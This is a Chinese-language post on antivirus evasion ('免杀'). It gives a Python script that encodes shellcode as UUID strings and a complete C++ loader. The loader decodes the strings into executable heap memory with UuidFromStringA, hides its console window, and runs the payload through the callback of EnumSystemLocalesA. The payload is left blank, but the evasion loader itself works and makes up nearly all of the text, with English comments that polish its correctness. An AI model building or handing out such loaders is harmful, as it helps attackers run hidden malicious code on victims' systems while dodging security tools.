免杀——UUID回调函数免杀

生成 UUID 的 Python 脚本(把 shellcode 每 16 字节编码为一个 UUID 字符串,写入 shellcode.c 供下方加载器还原):

import uuid
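# Raw payload bytes to encode. Left empty on the page; paste the payload in.
shellcode = b""

CHUNK = 16  # one UUID holds exactly 16 bytes


def shellcode_to_uuids(payload: bytes) -> list[str]:
    """Encode *payload* as a list of UUID strings, 16 bytes per entry.

    The chunk count is derived from ``len(payload)`` (the original looped a
    fixed 50 times, so anything other than exactly 800 bytes raised
    ``ValueError`` from ``uuid.UUID``), and the final chunk is zero-padded to
    16 bytes.

    ``bytes_le`` is deliberate: the loader rebuilds the bytes with
    ``UuidFromStringA``, which stores Data1/Data2/Data3 little-endian, so
    ``bytes=`` would scramble the first 8 bytes of every chunk.

    Returns an empty list for an empty payload.
    """
    out = []
    for off in range(0, len(payload), CHUNK):
        chunk = payload[off:off + CHUNK].ljust(CHUNK, b"\x00")
        out.append(str(uuid.UUID(bytes_le=chunk)))
    return out


def write_c_array(uuids: list[str], path: str = "shellcode.c") -> None:
    """Write *uuids* as a C ``const char* uuids[]`` initializer to *path*.

    Output format is byte-identical to the original script:
    ``const char* uuids[] ={"...","...",};`` (trailing comma is legal C).
    """
    body = "".join(f'"{u}",' for u in uuids)
    with open(path, "w", encoding="utf-8") as f:
        f.write("const char* uuids[] ={" + body + "};")


if __name__ == "__main__":
    uuids = shellcode_to_uuids(shellcode)
    write_c_array(uuids)
    print(uuids)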

 

加载器(C++):用 UuidFromStringA 把 UUID 字符串逐个还原到一块可执行堆内存,再借 EnumSystemLocalesA 的回调参数把控制流转到 shellcode:

#include <iostream>
#include <windows.h>

#include<Rpc.h>
#pragma comment(lib,"Rpcrt4.lib")

using namespace std;

// NOTE(review): marks the .data section readable/writable/executable. The
// loader below never executes anything from .data -- the payload is decoded
// into a HEAP_CREATE_ENABLE_EXECUTE heap -- so this flag is unused here and
// an RWE section is itself a well-known static indicator. Drop it if unused.
#pragma comment(linker, "/section:.data,RWE") 

// Link as a GUI-subsystem image so no console window appears, while still
// entering through the CRT startup that calls main().
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" ) 
// Disable incremental linking.
#pragma comment(linker, "/INCREMENTAL:NO") 

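int main()
{
    // UUID strings emitted by the generator script; each decodes to exactly
    // 16 bytes of the payload, in order. The two empty strings are
    // placeholders, so as written the first UuidFromStringA call fails and
    // the loader exits with -1. (The original line lacked its ';'.)
    const char* uuids[] = { "", "" };
    const size_t elems = sizeof(uuids) / sizeof(uuids[0]);
    const size_t needed = elems * sizeof(UUID); // sizeof(UUID) == 16

    // Private heap with execute permission: allocations from it are RWX, so
    // the decoded bytes can be called without a VirtualProtect step.
    HANDLE hc = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
    if (hc == NULL)
    {
        // The original passed an unchecked NULL heap handle to HeapAlloc.
        cout << "HeapCreate() failed: " << GetLastError() << endl;
        return -1;
    }

    // Size the buffer from the array instead of a fixed 0x100000 bytes so a
    // payload of more than 65536 UUIDs cannot be written past the end of the
    // allocation during decoding.
    BYTE* buf = (BYTE*)HeapAlloc(hc, HEAP_ZERO_MEMORY, needed);
    if (buf == NULL)
    {
        cout << "内存申请失败!" << endl;
        HeapDestroy(hc);
        return 0;
    }

    // UuidFromStringA stores the UUID struct with little-endian
    // Data1/Data2/Data3; the generator used uuid.UUID(bytes_le=...) for
    // exactly this reason, so the 16 bytes land in memory in original order.
    BYTE* cursor = buf;
    for (size_t i = 0; i < elems; i++)
    {
        RPC_STATUS status = UuidFromStringA((RPC_CSTR)uuids[i], (UUID*)cursor);
        if (status != RPC_S_OK)
        {
            cout << "UuidFromeStringA()!=S_OK" << endl;
            // HeapDestroy releases the heap and buf with it. The original
            // called CloseHandle() on the allocation pointer, which is not
            // a handle and does not free anything.
            HeapDestroy(hc);
            return -1;
        }
        cursor += sizeof(UUID);
    }

    // EnumSystemLocalesA invokes the supplied "callback" and so transfers
    // control to the decoded bytes. Execution reaches the cleanup below only
    // if the payload returns to its caller.
    EnumSystemLocalesA((LOCALE_ENUMPROCA)buf, 0);
    HeapDestroy(hc);
    return 0;
}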

 
